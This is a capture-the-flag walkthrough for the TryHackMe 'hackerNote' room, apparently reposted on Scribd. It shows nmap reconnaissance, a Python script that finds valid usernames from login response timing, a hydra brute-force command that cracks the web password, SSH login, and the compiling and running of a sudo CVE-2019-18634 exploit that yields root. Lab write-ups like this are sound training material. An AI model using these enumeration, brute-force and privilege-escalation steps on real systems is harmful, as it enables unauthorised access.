Scribd
Upload
942 views4 pages

Hackernote Tryhackme Walkthrough

The document describes exploiting CVE-2019-18634 on a target system. Nmap shows ports 22, 80, and 8080 open. Golang is identified as the backend language. Username enumeration finds the valid user 'james' and hydra cracks the password 'blue7', allowing SSH as james. The exploit code for CVE-2019-18634 is compiled and executed, granting root privileges.

Uploaded by

Marcelo Nunes
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
942 views4 pages

Hackernote Tryhackme Walkthrough

The document describes exploiting CVE-2019-18634 on a target system. Nmap shows ports 22, 80, and 8080 open. Golang is identified as the backend language. Username enumeration finds the valid user 'james' and hydra cracks the password 'blue7', allowing SSH as james. The exploit code for CVE-2019-18634 is compiled and executed, granting root privileges.

Uploaded by

Marcelo Nunes
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
  • Introduction and Initial Setup: Provides an introduction to a web exploitation challenge including environment details and initial steps to scan a target system using Nmap.
  • Scripting POST Requests: Details the automation of login attempts to a web application using a Python script to send POST requests.
  • Password Cracking Execution: Describes the execution of Hydra for brute-force password cracking and analysis of potential password formats and hints.
  • Exploit Execution: Covers the execution of a local privilege escalation exploit resulting in root access on the target system.

hackerNote is a custom webapp which we have to test using basic enumeration and

exxploitation skills.

IP: [Link]

Nmap scan results.

root@LAPTOP-U5913CMD:/home/akshay# nmap -A -T4 [Link]


Starting Nmap 7.80 ( [Link] ) at 2020-10-05 12:42 IST
Nmap scan report for [Link]
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 [Link] (RSA)
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home - hackerNote
8080/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home - hackerNote
No exact OS matches for host (If you know what OS is running on it, see
[Link] ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/5%OT=22%CT=1%CU=31706%PV=Y%DS=2%DC=T%G=Y%TM=5F7AC79
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(
OS:R=Y%DF=Y%T=40%W=F507%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

1) Which ports are open? (in numerical order)


-> 22,80,8080

2) What programming language is the backend written in?


-> Golang

There a login page on the website and it encloses a lot of details while loggin in.
If you are a user u get loggin you in even if the password is wrong.
So this can be used to enumerate users.

We will be writing script to calculate such tasks and using [Link] as a username
list.

We will be using requests library from python to make a POST request.

Script:

#!/usr/bin/env python

import requests
import json
import time
username_file = open("[Link]","r")
url = "[Link]

usernames = []
timings = dict()
for line in username_file:
[Link]([Link]("\n",""))

def doLogin(user):
creds = {"username":user,"password":"123"}
response = [Link](url,json=creds)
if response.status_code != 200: # This means there was an API error
print("Error:", response.status_code)

for user in usernames:


start = [Link]()
doLogin(user)
end = [Link]()
timings[user] = end - start

[Link](0.01)

print("Finished POST Requests")

largestValue = max([Link]())
smallestValue = min([Link]())

for user,time in [Link]():


if time >= largestValue * 0.9:
print(user + " is likely a valid user")

james is likely to be a valid user

james is the user and we can brute force the webpage.

3) How many usernames from the list are valid?


-> 1

4) What are/is the valid username(s)?


-> james

Wrong credential encoding Hint: My favourite colour and my favourite number

We can create wordlist using favourite colour and favourite number.

5) How many passwords were in your wordlist?


-> 180

root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote# hydra -l james -P


[Link] [Link] http-post-form
"/api/user/login:username=^USER^&password=^PASS^:Invalid Username Or Password"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in
military or secret service organizations, or for illegal purposes (this is non-
binding, these *** ignore laws and ethics anyway).

Hydra ([Link] starting at 2020-10-05 [Link]


[DATA] max 16 tasks per 1 server, overall 16 tasks, 180 login tries (l:1/p:180),
~12 tries per task
[DATA] attacking
http-post-form://[Link]:80/api/user/login:username=^USER^&password=^PASS^:Inva
lid Username Or Password
[STATUS] 48.00 tries/min, 48 tries in 00:01h, 132 to do in 00:03h, 16 active
[80][http-post-form] host: [Link] login: james password: blue7

6) What was the user's password?


-> blue7

Your notes:
My SSH details

So that I don't forget, my SSH password is dak4###37b

7) What's the user's SSH password?


-> dak4####7b

root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote# ssh james@[Link]


The authenticity of host '[Link] ([Link])' can't be established.
ECDSA key fingerprint is SHA256:le4aVVewKygXBn8lnt/vTK7VskXafxS0FKdZtszhOUg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[Link]' (ECDSA) to the list of known hosts.
james@[Link]'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-76-generic x86_64)

* Documentation: [Link]
* Management: [Link]
* Support: [Link]

System information as of Mon Oct 5 [Link] UTC 2020

System load: 0.12 Processes: 86


Usage of /: 49.2% of 9.78GB Users logged in: 0
Memory usage: 7% IP address for eth0: [Link]
Swap usage: 0%

59 packages can be updated.


0 updates are security updates.

Last login: Mon Feb 10 [Link] 2020 from [Link]


james@hackernote:~$ id
uid=1001(james) gid=1001(james) groups=1001(james)
james@hackernote:~$

8) What is the CVE number for the exploit?


-> CVE-2019-18634

root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634# scp
exploit.c james@[Link]:/tmp/
james@[Link]'s password:
exploit.c
100% 6311 42.1KB/s 00:00
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634# scp
james@[Link]:/tmp/
.git/ .gitignore LICENSE Makefile [Link] exploit.c
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634# scp
Makefile james@[Link]:/tmp/
james@[Link]'s password:
Makefile
100% 230 1.6KB/s 00:00
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634# ls
LICENSE Makefile [Link] exploit.c
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634#

james@hackernote:/tmp$ make
cc -Os -g3 -std=c99 -Wall -Wextra -Wpedantic -static -o exploit exploit.c
james@hackernote:/tmp$ ls
exploit Makefile
exploit.c systemd-private-9ba521bd205240aca29e8a88a0a33a4e-systemd-
[Link]-zFyWeF
[Link] systemd-private-9ba521bd205240aca29e8a88a0a33a4e-systemd-
[Link]-rOnd1n
[Link].1
james@hackernote:/tmp$ ./exploit
[sudo] password for james:
Sorry, try again.
# id
uid=0(root) gid=0(root) groups=0(root),1001(james)
#

You might also like